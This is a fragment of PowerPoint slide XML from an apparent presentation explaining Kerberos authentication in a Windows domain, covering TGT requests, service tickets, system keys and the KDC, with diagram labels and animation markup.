          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Kerberos client uses the TGT to request and then receive a service ticket for the local workstation from the KDC.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The workstation has a system key created when the computer joined the domain. The service ticket for the workstation is encrypted with this key.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The local LSA builds an access token from the credentials contained in the service ticket and grants or denies the user access.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Processes and Interactions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="34" name="Group 33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1547664" y="1212428"/>
            <a:ext cx="2754116" cy="3099843"/>
            <a:chOff x="195776" y="3065461"/>
            <a:chExt cx="2754116" cy="3099843"/>
          </a:xfrm>
        </p:grpSpPr>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208" y="3212407"/>
              <a:ext cx="2700684" cy="2952897"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="TextBox 35"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="312812" y="3296511"/>
              <a:ext cx="2567940" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Workstation</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="TextBox 36"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="312813" y="3539877"/>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7240" y="4003155"/>
              <a:ext cx="327713" cy="327713"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="TextBox 38"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="909969" y="4059289"/>
              <a:ext cx="1715503" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>User Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="40" name="Content Placeholder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4316" y="5321279"/>
              <a:ext cx="338649" cy="338649"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="TextBox 40"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="909969" y="5359479"/>
              <a:ext cx="1715503" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>System Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="TextBox 41"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="323229" y="4839449"/>
              <a:ext cx="2567940" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>Workstation Credential Cache</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>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5776" y="3065461"/>
              <a:ext cx="566691" cy="526075"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="44" name="Group 43"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1437489" y="4366190"/>
            <a:ext cx="2795151" cy="1441365"/>
            <a:chOff x="3025668" y="3771580"/>
            <a:chExt cx="2795151" cy="1441365"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="45" name="Picture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69693" y="3953993"/>
              <a:ext cx="2651126" cy="1258952"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>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25668" y="3771580"/>
              <a:ext cx="499308" cy="685686"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="TextBox 46"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3208778" y="4022720"/>
              <a:ext cx="2562935" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Server</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="TextBox 47"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3208778" y="4254546"/>
              <a:ext cx="2562935" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>Service Credentials Cache</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="49" name="Picture 4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22319" y="4593843"/>
              <a:ext cx="379222" cy="379222"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="TextBox 49"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3932492" y="4653136"/>
              <a:ext cx="1575612" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Service Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="51" name="Group 50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4706128" y="2201320"/>
            <a:ext cx="3209859" cy="2797046"/>
            <a:chOff x="5076056" y="2491496"/>
            <a:chExt cx="3209859" cy="2797046"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="52" name="Group 51"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5076056" y="2491496"/>
              <a:ext cx="3209859" cy="2797046"/>
              <a:chOff x="5771714" y="3212407"/>
              <a:chExt cx="3209859" cy="2797046"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="54" name="Picture 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05578" y="3394690"/>
                <a:ext cx="2973722" cy="2593105"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="55" name="TextBox 54"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6671087" y="3494731"/>
                <a:ext cx="1442703" cy="215444"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                  <a:t>Domain Controller</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="56" name="TextBox 55"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6589790" y="3753727"/>
                <a:ext cx="1612173" cy="184666"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="de-DE" sz="1200" dirty="0"/>
                  <a:t>KDC Account Database</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="57"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2299" y="4038027"/>
                <a:ext cx="327713" cy="327713"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="58" name="TextBox 57"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6763295" y="4077903"/>
                <a:ext cx="1806580" cy="1654299"/>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Service Key</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="1500"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                  <a:t>System Key</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="1500"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>Service Key</a:t>
                </a:r>
                <a:endParaRPr lang="de-DE" sz="1400" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="59" name="Picture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71714" y="3212407"/>
                <a:ext cx="628030" cy="741586"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="60" name="Picture 5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19698" y="5247578"/>
                <a:ext cx="761875" cy="761875"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="61" name="Picture 6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68600" y="4532126"/>
                <a:ext cx="351842" cy="351842"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="62" name="Content Placeholder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8390" y="5029693"/>
                <a:ext cx="338649" cy="338649"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="53" name="Picture 5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98919" y="4708880"/>
              <a:ext cx="379222" cy="379222"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="85835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1.66667E-6 2.22222E-6 L -0.14791 0.26991 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-7396" y="13495"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="18" presetID="10" presetClass="exit" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="44"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="44"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="21" presetID="42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -4.16667E-6 0 L 0.1165 0.14769 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="5816" y="7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1. Requesting the TGT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="1015663"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The request contains the user principal name, the name of the account domain and pre-authentication (time stamp) data encrypted with the user‘s key</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Processes and Interactions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Right Arrow 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3109495" y="3632210"/>
            <a:ext cx="2502616"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marL="228600" indent="-228600" algn="ctr">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0">
                <a:ln w="0"/>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>KRB_AS_REQ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="Group 17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5771714" y="3212407"/>
            <a:ext cx="3209859" cy="2797046"/>
            <a:chOff x="5771714" y="3212407"/>
            <a:chExt cx="3209859" cy="2797046"/>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78" y="3394690"/>
              <a:ext cx="2973722" cy="2593105"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="TextBox 7"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6671087" y="3494731"/>
              <a:ext cx="1442703" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Domain Controller</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="TextBox 8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6589790" y="3753727"/>
              <a:ext cx="1612173" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" sz="1200" dirty="0"/>
                <a:t>KDC Account Database</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3374" y="4099924"/>
              <a:ext cx="327713" cy="327713"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="TextBox 10"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6763295" y="4160207"/>
              <a:ext cx="1806580"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Service Key</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>System Key</a:t>
              </a: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1714" y="3212407"/>
              <a:ext cx="628030" cy="741586"/>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9698" y="5247578"/>
              <a:ext cx="761875" cy="761875"/>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8170" y="4609048"/>
              <a:ext cx="351842" cy="351842"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="34" name="Content Placeholder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95855" y="5119794"/>
              <a:ext cx="338649" cy="338649"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="195776" y="3065461"/>
            <a:ext cx="2754116" cy="3099843"/>
            <a:chOff x="195776" y="3065461"/>
            <a:chExt cx="2754116" cy="3099843"/>
          </a:xfrm>
        </p:grpSpPr>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9208" y="3212407"/>
              <a:ext cx="2700684" cy="2952897"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="TextBox 20"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="312812" y="3296511"/>
              <a:ext cx="2567940" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Workstation</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="TextBox 21"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="312813" y="3539877"/>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7240" y="4003155"/>
              <a:ext cx="327713" cy="327713"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="TextBox 23"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="909969" y="4059289"/>
              <a:ext cx="1715503" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>User Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="25" name="Content Placeholder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4316" y="5321279"/>
              <a:ext cx="338649" cy="338649"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="TextBox 25"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="909969" y="5359479"/>
              <a:ext cx="1715503" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>System Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="TextBox 26"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="323229" y="4839449"/>
              <a:ext cx="2567940" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>Workstation Credential Cache</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>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5776" y="3065461"/>
              <a:ext cx="566691" cy="526075"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="Group 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3111530" y="3857260"/>
            <a:ext cx="2522114" cy="982189"/>
            <a:chOff x="3111530" y="3857260"/>
            <a:chExt cx="2522114" cy="982189"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="33" name="Group 32"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
